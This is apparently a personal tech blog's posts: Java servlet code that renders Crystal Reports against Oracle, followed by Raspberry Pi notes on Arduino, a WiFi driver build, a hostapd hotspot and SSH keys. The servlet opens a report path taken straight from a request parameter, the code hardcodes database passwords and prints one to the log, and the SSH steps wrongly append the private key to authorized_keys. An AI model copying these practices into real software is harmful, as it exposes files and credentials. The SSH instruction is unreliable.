import com.crystaldecisions.sdk.occa.report.data.Fields;
import com.crystaldecisions.sdk.occa.report.data.ParameterField;
import com.crystaldecisions.sdk.occa.report.data.ParameterFieldDiscreteValue;
import com.crystaldecisions.sdk.occa.report.exportoptions.ExportOptions;
import com.crystaldecisions.sdk.occa.report.exportoptions.ReportExportFormat;
import com.crystaldecisions.sdk.occa.report.lib.IStrings;
import com.crystaldecisions.sdk.occa.report.lib.ReportSDKException;
import com.crystaldecisions.sdk.occa.report.lib.ReportSDKExceptionBase;
import com.crystaldecisions.sdk.occa.report.reportsource.IReportSource;

public class ReportServlet extends HttpServlet { 

  public static String JNDI_NAME = "java:comp/env/jdbc/psuat";

  //public static String JNDI_NAME = "jdbc/dhprd";

  @Override
  public void init(ServletConfig config) throws ServletException {
      String fontsPath = config.getServletContext().getRealPath("/") + "/WEB-INF/lib/fonts/";
      System.out.println("real path " + fontsPath);
      try {
          /*GraphicsEnvironment ge = GraphicsEnvironment.getLocalGraphicsEnvironment();
          ge.registerFont(Font.createFont(Font.TRUETYPE_FONT, new File(fontsPath + "mingliu.ttf")));
          ge.registerFont(Font.createFont(Font.TRUETYPE_FONT, new File(fontsPath + "mingliub.ttf")));
          ge.registerFont(Font.createFont(Font.TRUETYPE_FONT, new File(fontsPath + "times.ttf")));
          ge.registerFont(Font.createFont(Font.TRUETYPE_FONT, new File(fontsPath + "timesbd.ttf")));
          ge.registerFont(Font.createFont(Font.TRUETYPE_FONT, new File(fontsPath + "timesbi.ttf")));
          ge.registerFont(Font.createFont(Font.TRUETYPE_FONT, new File(fontsPath + "timesi.ttf")));

          String fonts[] = GraphicsEnvironment.getLocalGraphicsEnvironment().getAvailableFontFamilyNames();

          for (int i = 0; i < fonts.length; i++) {
              System.out.println("System font " + fonts[i]);
          }*/

      } catch (Exception e) {
          e.printStackTrace();
      }
  }

  @Override
  protected void doPost(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {
      doGet(req, resp);
  }

  @Override
  protected void doGet(HttpServletRequest req, HttpServletResponse resp) throws ServletException, IOException {

      String report = req.getParameter("report");
      if (report != null) {
          report = report.replace("file:", "");

          if ("127.0.0.1".equals(req.getLocalAddr()) || "10.13.135.40".equals(req.getLocalAddr())) {
              report = report.replace("/piers/apps/uat/installedApps/DHApps.ear/dh.war/rpt", "");
          } else {
              if (report.indexOf("uat") != -1) {
                  report = report.replace("/piers/apps/uat", "/dh/apps/prod");
              }
          }
      }

      //      List<String> promptValues = retrieveParameterValues(req);

      System.out.println("report = " + report);

      ReportClientDocument reportClientDoc = new ReportClientDocument();

      Map parameterMap = new HashMap();

      try {
          reportClientDoc.setLocale(Locale.TRADITIONAL_CHINESE);

          reportClientDoc.open(report, 0);

          ReportUtil.switch_tables(reportClientDoc.getDatabaseController());

          //Perform the same operation against all tables in the subreport as well.
          IStrings subreportNames = reportClientDoc.getSubreportController().getSubreportNames();

          //Set the datasource for all the subreports.
          for (int i = 0; i < subreportNames.size(); i++) {
              ISubreportClientDocument subreportClientDoc = reportClientDoc.getSubreportController().getSubreport(
                      subreportNames.getString(i));

              //Switch tables for each subreport in the report using the same connection information.  See utility
              //method below.
              ReportUtil.switch_tables(subreportClientDoc.getDatabaseController());

          }

          Fields paraFields = reportClientDoc.getDataDefinition().getParameterFields();

          for (int i = 0; i < paraFields.size(); i++) {
              String value = "";

              // get pre-set value
              ParameterField field = (ParameterField) paraFields.get(i);
              if (field.getValues() != null && field.getValues().size() > 0) {
                  ParameterFieldDiscreteValue v = (ParameterFieldDiscreteValue) field.getValues().get(0);
                  value = v.getValue().toString();
              }

              String paramValue = req.getParameter("prompt" + i);
              System.out.println("paramValue = " + paramValue);
              if (paramValue != null) {
                  value = paramValue;
                  if (value.indexOf("Date") != -1) {
                      parameterMap.put(field.getName(), getDate(value));
                  } else {
                      parameterMap.put(field.getName(), value);
                  }
              } else {
                  parameterMap.put(field.getName(), value);
              }
          }

          Fields fields = ReportUtil.prepareParameter(report, parameterMap);

          IReportSource reportSource = reportClientDoc.getReportSource();

          showByPdf(reportSource, fields, req, resp);
      } catch (ReportSDKException e) {
          e.printStackTrace();
      } catch (ReportSDKExceptionBase e) {
          e.printStackTrace();
      }

  }

  private void showByPdf(IReportSource reportSource, Fields fields, HttpServletRequest req, HttpServletResponse resp)
          throws ReportSDKExceptionBase {
      ExportOptions exportOptions = new ExportOptions();
      exportOptions.setExportFormatType(ReportExportFormat.PDF);

      ReportExportControl exportControl = new ReportExportControl();
      exportControl.setReportSource(reportSource);
      exportControl.setExportOptions(exportOptions);
      exportControl.setExportAsAttachment(false);
      exportControl.setParameterFields(fields);
      exportControl.setOwnPage(true);

      exportControl.processHttpRequest(req, resp, req.getSession().getServletContext(), null);

      exportControl.dispose();
  }

  private void showByHtml(IReportSource reportSource, Fields fields, HttpServletRequest req, HttpServletResponse resp)
          throws ReportSDKExceptionBase, IOException {
      //JPEReportSourceFactory rptSrcFactory = new JPEReportSourceFactory();
      //Object reportSource =rptSrcFactory.createReportSource(report,Locale.TRADITIONAL_CHINESE);
      CrystalReportViewer viewer = new CrystalReportViewer();

      viewer.setReportSource(reportSource);
      viewer.setPrintMode(CrPrintMode.ACTIVEX);
      viewer.setParameterFields(fields);
      viewer.setOwnPage(true);
      String html = viewer.getHtmlContent(req, resp, getServletContext());
      System.out.println("html = " + html);

      resp.setHeader("Cache-Control", "no-cache, post-check=0, pre-check=0");
      resp.setContentType("text/html");
      resp.setCharacterEncoding("UTF-8");

      viewer.processHttpRequest(req, resp, req.getSession().getServletContext(), resp.getWriter());
      viewer.dispose();
  }

  private List<String> retrieveParameterValues(HttpServletRequest req) {
      List<String> parameterValues = new ArrayList<String>();
      Enumeration<String> e = req.getParameterNames();
      List<String> paraNames = new ArrayList<String>();

      while (e.hasMoreElements()) {
          String paramName = e.nextElement();
          paraNames.add(paramName);
      }

      Collections.sort(paraNames);
      for (String paramName : paraNames) {
          String paramValue = req.getParameter(paramName);

          System.out.println("paramName = " + paramName + ", paramValue = " + paramValue);
          if (paramName.startsWith("prompt")) {
              System.out.println("prompt = " + paramValue);
              parameterValues.add(paramValue);
          }
      }

      return parameterValues;
  }

  private Date getDate(String date) {
      Calendar c = Calendar.getInstance();
      Pattern p = Pattern.compile("Date\\((\\d+),(\\d+),(\\d+)\\)");
      Matcher m = p.matcher(date);
      if (m.matches()) {
          System.out.println("year " + m.group(1) + ",month " + m.group(2) + ", date " + m.group(3));
          c.set(Calendar.YEAR, Integer.parseInt(m.group(1)));
          c.set(Calendar.MONTH, Integer.parseInt(m.group(2)));
          c.set(Calendar.DAY_OF_MONTH, Integer.parseInt(m.group(3)));
      }
      return c.getTime();
  }
}

ReportUtil

package dh.report;

import java.util.Iterator;
import java.util.Map;

import javax.servlet.http.HttpSession;

import com.crystaldecisions.report.web.viewer.ReportExportControl;
import com.crystaldecisions.sdk.occa.report.application.DBOptions;
import com.crystaldecisions.sdk.occa.report.application.DatabaseController;
import com.crystaldecisions.sdk.occa.report.application.ReportClientDocument;
import com.crystaldecisions.sdk.occa.report.data.ConnectionInfo;
import com.crystaldecisions.sdk.occa.report.data.ConnectionInfoKind;
import com.crystaldecisions.sdk.occa.report.data.ConnectionInfos;
import com.crystaldecisions.sdk.occa.report.data.Fields;
import com.crystaldecisions.sdk.occa.report.data.IConnectionInfo;
import com.crystaldecisions.sdk.occa.report.data.ITable;
import com.crystaldecisions.sdk.occa.report.data.ParameterField;
import com.crystaldecisions.sdk.occa.report.data.ParameterFieldDiscreteValue;
import com.crystaldecisions.sdk.occa.report.data.Tables;
import com.crystaldecisions.sdk.occa.report.data.Values;
import com.crystaldecisions.sdk.occa.report.lib.PropertyBag;
import com.crystaldecisions.sdk.occa.report.lib.PropertyBagHelper;
import com.crystaldecisions.sdk.occa.report.lib.ReportSDKException;

public class ReportUtil {

    public static Object getReportSource(HttpSession session, String reportName) throws ReportSDKException {
        System.out.println("getReportSource() ---------- start ----------------- \n reportName=" + reportName
                + "\n session=" + session);
        //      if(session==null || reportName==null){
        //          return null ;
        //      }

        Object reportSource = session.getAttribute("reportSource");

        if (reportSource == null) {
            System.out.println("getReportSource() ......... reportSource == null ,  create reportSource");
            ReportClientDocument reportClientDoc = new ReportClientDocument();
            reportClientDoc.open(reportName, 0);
            reportSource = reportClientDoc.getReportSource();
            session.setAttribute("reportSource", reportSource);
        }
        System.out.println("getReportSource() ---------- finish ----------------- \n reportSource=" + reportSource);
        return reportSource;

    }

    public static ParameterField createParameter(String parameterName, Object parameterValue) {
        System.out.println("createParameter() ---------- start ----------------- \t parameterName=" + parameterName
                + "\t parameterValue=" + parameterValue);
        ParameterField pfield = new ParameterField();
        pfield.setName(parameterName);
        pfield.setReportName("");

        Values vals = new Values();
        ParameterFieldDiscreteValue pfieldDV = new ParameterFieldDiscreteValue();
        pfieldDV.setValue(parameterValue);
        vals.add(pfieldDV);

        pfield.setCurrentValues(vals);

        return pfield;
    }

    public static Fields prepareParameter(String reportTemplateFileName, Map parameterMap) {
        //      logger.info("prepareParameter() ---------- start ----------------- \t parameterName=" + parameterName + "\t parameterValue=" + parameterValue) ;
        System.out.println("prepareParameter() ---------- start ----------------- \t reportTemplateFileName="
                + reportTemplateFileName + "\t parameterMap=" + parameterMap);

        Fields fields = null;

        if (parameterMap != null) {
            fields = new Fields();
            for (Iterator itr = parameterMap.keySet().iterator(); itr.hasNext();) {
                String key = (String) itr.next();
                if (key != null) {
                    Object value = parameterMap.get(key);
                    fields.add(ReportUtil.createParameter(key, value));
                    System.out.println("put parameter " + key + " : " + value);
                }
            }
        }

        System.out.println("prepareParameter() ---------- Finish ----------------- \t fields=" + fields);

        return fields;
    }

    /*
     // ref: Crystal report official tutorial
    public static void changeDataSource(ReportClientDocument rcd) throws ReportSDKException
    {

        System.out.println("changeDataSource() ---------- start ----------------- \t rcd=" + rcd);
      DatabaseController databaseController = rcd.getDatabaseController();
      ConnectionInfos connectionInfos = (ConnectionInfos)databaseController.getConnectionInfos(null);
      IConnectionInfo oldConnectionInfo = connectionInfos.getConnectionInfo(0);
      IConnectionInfo newConnectionInfo = new ConnectionInfo();

      newConnectionInfo.setKind(ConnectionInfoKind.SQL);

      PropertyBag newProperties = new PropertyBag();
      newProperties.putStringValue("DSN", "Xtreme Sample Database 2005");
      newProperties.put("UseDSNProperties", false);
      newProperties.putStringValue(PropertyBagHelper.CONNINFO_SERVER_NAME, "Xtreme Sample Database 2005");
      newProperties.putStringValue(PropertyBagHelper.CONNINFO_SERVER_TYPE, "ODBC (RDO)");
      newProperties.putStringValue(PropertyBagHelper.CONNINFO_DATABASE_DLL, "crdb_odbc.dll");

      newConnectionInfo.setAttributes(newProperties);
      newConnectionInfo.setUserName("guest");
      newConnectionInfo.setPassword("bobobo");

      try
      {
        databaseController.replaceConnection(oldConnectionInfo, newConnectionInfo, null, DBOptions._useDefault);
      }
      catch (ReportSDKException error)
      {
        System.out.println(error.getSDKError());
      }

      System.out.println("changeDataSource() ---------- finish ----------------- ");
    }
    */

    // Change the document's all table's source to a JNDI， 实际上是不行的
    // ref: http://scn.sap.com/thread/1688419
    public static void changeDB(ReportClientDocument rcd, String reportJndiName) {
        System.out.println("changeDB() ---------- start ----------------- \t rcd=" + rcd + "\t change to JNDI:"
                + reportJndiName);
        DatabaseController databaseController;
        try {
            databaseController = rcd.getDatabaseController();

            IConnectionInfo connectionInfo = new ConnectionInfo();
            PropertyBag propertyBag = new PropertyBag();
            propertyBag.put("JNDI Datasource Name", reportJndiName);
            propertyBag.put("Use JDBC", "true");
            // by Ricky
            //      propertyBag.put("Database DLL", DATABASE_DLL); // required!!! (but we don't actually provide a DLL, or even run in windows)
            propertyBag.put(PropertyBagHelper.CONNINFO_DATABASE_DLL, "crdb_oracle.dll");

            connectionInfo.setAttributes(propertyBag);
            connectionInfo.setKind(ConnectionInfoKind.SQL);

            ConnectionInfos connectionInfos = databaseController.getConnectionInfos(null);
            IConnectionInfo oldConnectionInfo = connectionInfos.getConnectionInfo(0);

            databaseController.replaceConnection(oldConnectionInfo, connectionInfo, null, DBOptions._useDefault);
        } catch (ReportSDKException e) {
            e.printStackTrace();
        }

        System.out.println("changeDB() ---------- finish ----------------- ");
    }

  // 全局性转换登录信息
    public static void changeDB2(ReportClientDocument rcd, String reportJndiName) {
        String DBUSERNAME = "dhdba";
        String DBPASSWORD = "password";
        String CONNECTION_STRING = "jdbc:oracle:thin:@server:1521:sid";
        String SERVERTYPE = "JDBC (JNDI)";
        String DATABASE_DLL = "crdb_oracle.dll";
        String DATABASE = "server";
        final String TRUSTEDCON = "false";
        String DBCLASSNAME = "oracle.jdbc.driver.OracleDriver";
        String USEJDBC = "true";
        String SERVERNAME = "jdbc:oracle:thin:@server:1521:sid";
        String CONNECTIONURL = "jdbc:oracle:thin:@server:1521:sid";
        String SERVER = "server";
        final String DATABASE_NAME = "sid";

        try {
            System.out.println("change to " + reportJndiName);
            // Set DB Username and Password
            //rcd.getDatabaseController().logon(DBUSERNAME, DBPASSWORD);

            // Create the two connectioninfo objects to use
            IConnectionInfo oldConnectionInfo = new ConnectionInfo();
            IConnectionInfo newConnectionInfo = new ConnectionInfo();

            // Assign the old Connection info to the reports current info
            DatabaseController dbController = rcd.getDatabaseController();
            oldConnectionInfo = dbController.getConnectionInfos(null).getConnectionInfo(0);

            // Create a new propertybag for the new location
            PropertyBag boPropertyBag1 = new PropertyBag();

            // Set new table logon properties
            boPropertyBag1.put("JDBC Connection String", CONNECTION_STRING);
            boPropertyBag1.put("Trusted_Connection", TRUSTEDCON);
            boPropertyBag1.put("Server Type", SERVERTYPE);
            boPropertyBag1.put("Database DLL", DATABASE_DLL);
            boPropertyBag1.put("Database", DATABASE);
            boPropertyBag1.put("Database Class Name", DBCLASSNAME);
            boPropertyBag1.put("Use JDBC", USEJDBC);
            boPropertyBag1.put("Database Name", DATABASE_NAME);
            boPropertyBag1.put("Server Name", SERVERNAME);
            boPropertyBag1.put("Connection URL", CONNECTIONURL);
            boPropertyBag1.put("Server", SERVER);

            // Assign the properties to the connection info
            newConnectionInfo.setAttributes(boPropertyBag1);

            // Set the DB Username and Pwd
            newConnectionInfo.setUserName(DBUSERNAME);
            newConnectionInfo.setPassword(DBPASSWORD);

            // The Kind of connectionInfos is SQL
            newConnectionInfo.setKind(ConnectionInfoKind.SQL);

            // set the parameters to replace.
            // The 4 options are:
            // _doNotVerifyDB
            // _ignoreCurrentTableQualifiers
            // _mapFieldByRowsetPosition
            // _useDefault
            int replaceParams = DBOptions._ignoreCurrentTableQualifiers + DBOptions._doNotVerifyDB;
            //int replaceParams = DBOptions._useDefault;

            // Now replace the connections
            dbController.replaceConnection(oldConnectionInfo, newConnectionInfo, null, replaceParams);

            //Store the report source in session, will be used by the CrystalReportViewer.

        } catch (ReportSDKException ex) {
            ex.printStackTrace();
        } catch (Exception ex) {
            ex.printStackTrace();
        }
    }

  // 对Report里每一Table进行转换
    public static void changeDB3(ReportClientDocument rcd, String reportJndiName) {
        final String TABLE_NAME_QUALIFIER = "dhdba.";
        final String DBUSERNAME = "dhdba";
        final String DBPASSWORD = "password";
        String CONNECTION_STRING = "jdbc:oracle:thin:@server:1521:sid";
        final String DATABASE_NAME = "dhdba";
        final String URI = "!oracle.jdbc.driver.OracleDriver!jdbc:oracle:thin:@server:1521:sid";
        String SERVERNAME = "jdbc:oracle:thin:@server:1521:sid";
        final String DATABASE_DLL = "crdb_jdbc.dll";
        String DBCLASSNAME = "oracle.jdbc.driver.OracleDriver";

        try {
            DatabaseController dbController = rcd.getDatabaseController();
            Tables tables = dbController.getDatabase().getTables();
            for (int i = 0; i < tables.size(); i++) {

                ITable table = tables.getTable(i);

                //Keep existing name and alias.
                table.setName(table.getName());
                table.setAlias(table.getAlias());
                System.out.println("getName " + table.getName());
                System.out.println("getAlias" + table.getAlias());
                //Change properties that are different from the original datasource.
                table.setQualifiedName(TABLE_NAME_QUALIFIER + table.getName());

                //Change connection information properties.
                IConnectionInfo connectionInfo = table.getConnectionInfo();
                connectionInfo.getAttributes().clear();
                //Set new table connection property attributes.
                PropertyBag propertyBag = new PropertyBag();

                //Overwrite any existing properties with updated values.
                propertyBag.put("Trusted_Connection", "false");
                propertyBag.put("Server Name", SERVERNAME); //Optional property.
                propertyBag.put("Connection String", CONNECTION_STRING);
                propertyBag.put("Database Name", DATABASE_NAME);
                //propertyBag.put("Server Type", "JDBC (JNDI)");
                propertyBag.put("URI", URI);
                propertyBag.put("Use JDBC", "false");
                propertyBag.put("JDBC Connection String", CONNECTION_STRING);
                propertyBag.put("Database Class Name", DBCLASSNAME);
                propertyBag.put("Database DLL", DATABASE_DLL);
                propertyBag.put("Connection Name", CONNECTION_STRING);
                propertyBag.put("PreQEServerName", "server");
                propertyBag.put("PASSWORD", "password");

                connectionInfo.setAttributes(propertyBag);

                //Set database username and password.
                //NOTE: Even if these the username and password properties don't change when switching databases, the
                //database password is *not* saved in the report and must be set at runtime if the database is secured.
                connectionInfo.setUserName(DBUSERNAME);
                connectionInfo.setPassword(DBPASSWORD);
                connectionInfo.setKind(ConnectionInfoKind.SQL);

                table.setConnectionInfo(connectionInfo);
                rcd.getDatabaseController().logon(DBUSERNAME, DBPASSWORD);
                //Update old table in the report with the new table.
                dbController.setTableLocation(table, tables.getTable(i));

            }

        } catch (ReportSDKException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

    }

    public static void changeDB4(ReportClientDocument rcd, String reportJndiName, ReportExportControl exportControl)
            throws ReportSDKException {
        IConnectionInfo oldConnectionInfo = new ConnectionInfo();
        IConnectionInfo newConnectionInfo = new ConnectionInfo();

        String DBUSERNAME = "dhdba";
        String DBPASSWORD = "password";
        String CONNECTION_STRING = "jdbc:oracle:thin:@server:1521:sid";
        String SERVERTYPE = "JDBC (JNDI)";
        String DATABASE_DLL = "crdb_oracle.dll";
        String DATABASE = "server";
        final String TRUSTEDCON = "false";
        String DBCLASSNAME = "oracle.jdbc.driver.OracleDriver";
        String USEJDBC = "true";
        String SERVERNAME = "jdbc:oracle:thin:@server:1521:sid";
        String CONNECTIONURL = "jdbc:oracle:thin:@server:1521:sid";
        String SERVER = "server";
        final String DATABASE_NAME = "sid";

        // Assign the old Connection info to the reports current info
        DatabaseController dbController = rcd.getDatabaseController();
        oldConnectionInfo = dbController.getConnectionInfos(null).getConnectionInfo(0);

        // Create a new propertybag for the new location
        PropertyBag boPropertyBag1 = new PropertyBag();

        // Set new table logon properties
        boPropertyBag1.put("JDBC Connection String", CONNECTION_STRING);
        boPropertyBag1.put("Trusted_Connection", TRUSTEDCON);
        boPropertyBag1.put("Server Type", SERVERTYPE);
        boPropertyBag1.put("Database DLL", DATABASE_DLL);
        boPropertyBag1.put("Database", DATABASE);
        boPropertyBag1.put("Database Class Name", DBCLASSNAME);
        boPropertyBag1.put("Use JDBC", USEJDBC);
        boPropertyBag1.put("Database Name", DATABASE_NAME);
        boPropertyBag1.put("Server Name", SERVERNAME);
        boPropertyBag1.put("Connection URL", CONNECTIONURL);
        boPropertyBag1.put("Server", SERVER);

        // Assign the properties to the connection info
        newConnectionInfo.setAttributes(boPropertyBag1);

        // Set the DB Username and Pwd
        newConnectionInfo.setUserName(DBUSERNAME);
        newConnectionInfo.setPassword(DBPASSWORD);

        // The Kind of connectionInfos is SQL
        newConnectionInfo.setKind(ConnectionInfoKind.SQL);

        // set the parameters to replace.
        // The 4 options are:
        // _doNotVerifyDB
        // _ignoreCurrentTableQualifiers
        // _mapFieldByRowsetPosition
        // _useDefault
        int replaceParams = DBOptions._ignoreCurrentTableQualifiers + DBOptions._doNotVerifyDB;

        ConnectionInfos infos = new ConnectionInfos();
        infos.add(newConnectionInfo);
        Iterator it = infos.iterator();
        while (it.hasNext()) {
            ConnectionInfo info = (ConnectionInfo) it.next();
            PropertyBag bag = info.getAttributes();
            System.out.println("EEEEE " + bag.getStringValue("JDBC Connection String"));
            System.out.println("EEEEE " + info.getPassword());
        }

        exportControl.setDatabaseLogonInfos(infos);  // 尝试用exportControl设置登录信息
    }

  // 唯有这个方法可行，其他都失败了
    public static void switch_tables(DatabaseController databaseController) throws ReportSDKException {

        final String TABLE_NAME_QUALIFIER = "DHDBA.";
        final String SERVERNAME = "server";
        final String CONNECTION_STRING = "Use JDBC=b(true);Connection URL=s(jdbc:oracle:thin:@server:1521:sid);"
                + "Database Class Name=s(oracle.jdbc.driver.OracleDriver);Server=s(server);"
                + "User ID=s(dhdba);Password=;Trusted_Connection=b(false);"
                + "JDBC Connection String=s(!oracle.jdbc.driver.OracleDriver!jdbc:oracle:thin:{userid}/{password}@server:1521:sid)";
        final String JNDI_DATASOURCE_NAME = "testing";
        final String DATABASE_CLASS_NAME = "oracle.jdbc.driver.OracleDriver";
        final String DATABASE_DLL = "crdb_jdbc.dll";
        final String DBURI = "!oracle.jdbc.driver.OracleDriver!jdbc:oracle:thin:{userid}/{password}@server:1521:sid";
        final String DBUSERNAME = "dhdba";
        final String DBPASSWORD = "password";

        //Obtain collection of tables from this database controller.
        Tables tables = databaseController.getDatabase().getTables();

        //Set the datasource for all main report tables.
        for (int i = 0; i < tables.size(); i++) {

            ITable table = tables.getTable(i);

            //Keep existing name and alias.
            table.setName(table.getName());
            table.setAlias(table.getAlias());

            //Change properties that are different from the original datasource.
            table.setQualifiedName(TABLE_NAME_QUALIFIER + table.getName());

            //Change connection information properties.
            IConnectionInfo connectionInfo = table.getConnectionInfo();

            PropertyBag innerProp = connectionInfo.getAttributes();
            innerProp.clear();

            //Set new table connection property attributes.
            PropertyBag propertyBag = new PropertyBag();

            //Overwrite any existing properties with updated values.
            propertyBag.put("Trusted_Connection", "b(false)");
            propertyBag.put("Server Name", SERVERNAME);
            propertyBag.put("Connection String", CONNECTION_STRING);
            propertyBag.put("Server Type", "JDBC (JNDI)");
            propertyBag.put("JNDI Datasource Name", JNDI_DATASOURCE_NAME);
            propertyBag.put("Database Class Name", DATABASE_CLASS_NAME);
            propertyBag.put("Use JDBC", "true");
            propertyBag.put("URI", DBURI);
            propertyBag.put("Database DLL", DATABASE_DLL);

            connectionInfo.setAttributes(propertyBag);

            //Set database username and password.
            //NOTE: Even if these the username and password properties don't change when switching databases, the
            //database password is *not* saved in the report and must be set at runtime if the database is secured.
            connectionInfo.setUserName(DBUSERNAME);
            connectionInfo.setPassword(DBPASSWORD);
            connectionInfo.setKind(ConnectionInfoKind.SQL);

            table.setConnectionInfo(connectionInfo);

            //Update old table in the report with the new table.
            databaseController.setTableLocation(table, tables.getTable(i));

        }

    }

}

参考资料：
http://www.sdn.sap.com/irj/boc/index?rid=/webcontent/uuid/909355da-5b84-2b10-76a4-eed3ccf9e650
http://www.sdn.sap.com/irj/boc/index?rid=/webcontent/uuid/c020cd81-5c84-2b10-3585-bff096303cf6

2013-05-31

2013-05-31

Linking Arduino Uno to the Raspberry Pi

sudo apt-get install arduino ( It will install openjdk-6-jre, librxtx-java, avr-libc, avrdude etc )<span></span><span></span>  
sudo apt-get install python-pip  
pip install ino  
mkdir blink; cd blink  
ino init -t blink  
ino build   
ino upload (port: <span>default /dev/ttyACM0 for Uno)</span>  
ino serial

Reference:

http://www.recantha.co.uk/blog/?p=1103
http://inotool.org/quickstart
http://netduinoplusfun.wordpress.com/2012/06/13/arduino-ide/
http://elinux.org/RPi_Serial_Connection
http://www.suppertime.co.uk/blogmywiki/2012/09/pi-shall-tweet-unto-arduino/
http://www.satsignal.eu/ntp/Raspberry-Pi-NTP.html
http://blog.oscarliang.net/raspberry-pi-and-arduino-connected-serial-gpio/
http://baldwisdom.com/category/raspberry-pi/
The linux document Project http://www.tldp.org/HOWTO/Text-Terminal-HOWTO-10.html

2013-04-22

2013-04-22

Oracle call store procedure

1
2
3

variable cur refcursor;
execute GET_APP_POOL_CURSOR(:cur, 'SCREEN', 'N');
print :cur

sf.getCurrentSession().doWork(new Work() {
 @Override
 public void execute(Connection conn) throws SQLException {
  final CallableStatement cs = conn.prepareCall("{call GET_APP_POOL_CURSOR(?, ?, ?)}");
  cs.registerOutParameter(1, oracle.jdbc.OracleTypes.CURSOR);
  cs.setString(2, "aa");
  cs.setString(3, "bb");

  cs.execute();
  final ResultSet rs = (ResultSet) cs.getObject(1);
  while (rs.next()) {
    final EvaluationAnpAppVW evaluationAnpAppVW = new EvaluationAnpAppVW();
    evaluationAnpAppVW.setAnpPrdSeq(rs.getLong(2));
  }
 }
}

2013-02-21

2013-02-21

Install Mercury MW150US WIFI dongle on RPi

The wifi dongle cannot be recognized by command lsusb and lsusb, found the chipset of MW150US is rtl8188eu, not rtl8192cu, it is very important.

My RPi kernel is 3.2.27+, it is need to compile module rtl8188eu with RPi source code.

Procedure as below

# apt-get install build-essential
#
# cd /usr/src
# wget -O rpi-3.2.27.tar.gz https://github.com/raspberrypi/linux/tarball/rpi-3.2.27
# tar xzf ./rpi-3.2.27.tar.gz
# KVER=`uname -r`
# mv raspberrypi-linux-* linux-$KVER
# cd linux-$KVER/
# sed -i 's/EXTRAVERSION =.*/EXTRAVERSION = +/' Makefile
# zcat /proc/config.gz > .config
# wget https://github.com/raspberrypi/firmware/raw/master/extra/Module.symvers
# make oldconfig
# make modules_prepare
# ln -s /usr/src/linux-$KVER /usr/src/linux
# ln -s /usr/src/linux-$KVER /lib/modules/$KVER/source
# ln -s /usr/src/linux-$KVER /lib/modules/$KVER/build

Get rtl8188eu source code from http://gutspot.com/wp-content/uploads/2013/01/8188eu_USB_linux.zip
unzip the file and go to directory driver
# make && make install

In my case, it’s all. The module rtl8188eu has been load into RPi, MW150US WIFI dongle can be recognized.

1
2
3

ifconfig -a
iwcofnig
iwlist wlan0 scan

If it does not work, try the following method,

# lsmod
# rmmod 8192cu
# insmod 8188eu.ko
# modprobe 8188eu
# modinfo 8188eu
for autoload in RPi
# echo "8188eu" >> /etc/modules
# echo "blacklist rtl8192cu" >> /etc/modprobe.d/blacklist.conf (not necessary)

sudo nano /etc/network/interfaces

auto lo

iface lo inet loopback
iface eth0 inet dhcp

auto wlan0
iface wlan0 inet dhcp
# try one of below options
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
OR
pre-up wpa_supplicant -Dwext -iwlan0 -c/etc/wpa_supplicant.conf -B

sudo nano /etc/wpa_supplicant/wpa_supplicant.conf

network={
ssid="YOUR-SSID"
scan_ssid=1
proto=RSN
key_mgmt=WPA-PSK
pairwise=CCMP TKIP
group=CCMP TKIP
psk="WPA-PASSWORD" # wpa_passphrase
}

Join WIFI network by running from command prompt with wpa_cli

#wpa_cli
>scan
>scan_results
>add_network
>set_network 0 ssid "Xperia T2 Ultra"
>set_network 0 psk "74125896"
>enable_network 0

For reference

ssid:   your wifi name
scan_ssid:   value of 1 means broadcast and value of 2 means hidden (suggest you enter value of 1)
psk:   your wifi password
proto:   your choice of RSN or WPA. RSN is WP2 and WPA is WPA1. (most config is RSN)
key_mgmt:   your choice of WPA-PSK or WPA-EAP (pre-shared or enterprise respectively)
pairwise:   your choice of CCMP or TKIP ( WPA2 or WPA1 respectively)
auth_alg:   OPEN option is required for WPA and WPA2 (other option, SHARED & LEAP)

Then run

# /etc/init.d/networking restart
Or
# ifup wlan0

# dhclient wlan0

script for auto-start wifi connection(Optional) /etc/init.d/wifi-connect

#!/bin/sh
#wifi-connect auto-start

case $1 in
start)
  wpa_supplicant -B -iwlan0 -c/etc/wpa_supplicant/wpa_supplicant.conf -Dwext -s
  wpa_cli -B -p/var/lib/run/wpa_supplicant -s
 ;;
stop)

 ;;
restart)

 ;;
*)
 echo 'Usage:wifi-connect start|stop|restart'
 ;;
esac
exit 0

# chmod +x /etc/init.d/wifi-connect
# update-rc.d wifi-connect defaults
# update-rc.d -f wifi-connect remove

Install hostapd

unzip wpa_supplicant_hostapd-0.8_rtw_20120803.zip
go to directory hostapd and compile
make && make install
** should not ** start hostapd by /etc/init.d/hostapd start just run
/usr/local/bin/hostapd p2p_hostapd.conf -B
then hostapd started with ssid DIRECT-RT
config IP address
ifconfig wlan0 192.168.0.1 netmask 255.255.255.0 (the segment should be match with udhcp)
sudo apt-get udhcpd
/etc/init.d/udhcp start

Open your mobile’s wifi to search ssid “DIRECT-RT” and pair with it using pasword “12345678”, it will obtain the IP adddress dynamically.

Reference:

http://omer.me/2012/04/setting-up-wireless-networks-under-debian-on-raspberry-pi/
http://tasksofohm.wordpress.com/hardware/connecting-raspberry-to-a-ew-7811un
http://www.ctrl-alt-del.cc/2012/05/raspberry-pi-meets-edimax-ew-7811un-wireless-ada.html
https://guts.me/2013/01/30/set-up-wifi-router-with-raspberry-pi-2-compile-driver-for-8188eu-and-set-up-hostap/
http://blog.elevendroids.com/2012/12/building-tp-link-tl-wn725n-wifi-usb-adapter-driver-for-raspberry-pi/
http://jarhead.blog.163.com/blog/static/175217041201317102236535/
http://alansun.iteye.com/blog/1150893

hostapd

http://www.raspberrypi.org/phpBB3/viewtopic.php?t=19120 http://elinux.org/RPI-Wireless-Hotspot

*** New Version for 3.12.22+ ***
Just install a script to install rtl8188eu.ko as below,
tar -zxvf 8188eu-201xyyzz.tar.gz
<–set data code for driver version above

1
2
3

sudo install -p -m 644 8188eu.ko /lib/modules/$(uname -r)/kernel/drivers/net/wireless
sudo insmod /lib/modules/$(uname -r)/kernel/drivers/net/wireless/8188eu.ko
sudo depmod -a

http://www.raspberrypi.org/forums/viewtopic.php?p=462982#p462982
http://www.fars-robotics.net/

2013-02-14

2013-02-14

SSH login without password

ssh-keygen -t rsa -b 2048
set passphase for id_rsa
copy id_rsa.pub to remoteIP's folder .ssh/
cat id_rsa >> authorized_keys
chmod 640 authorized_keys

ssh-agent bash --login -i
ssh-add
ssh felix@remoteIP OR ssh -A felix@remoteIP (agent forwarding) 
OR 
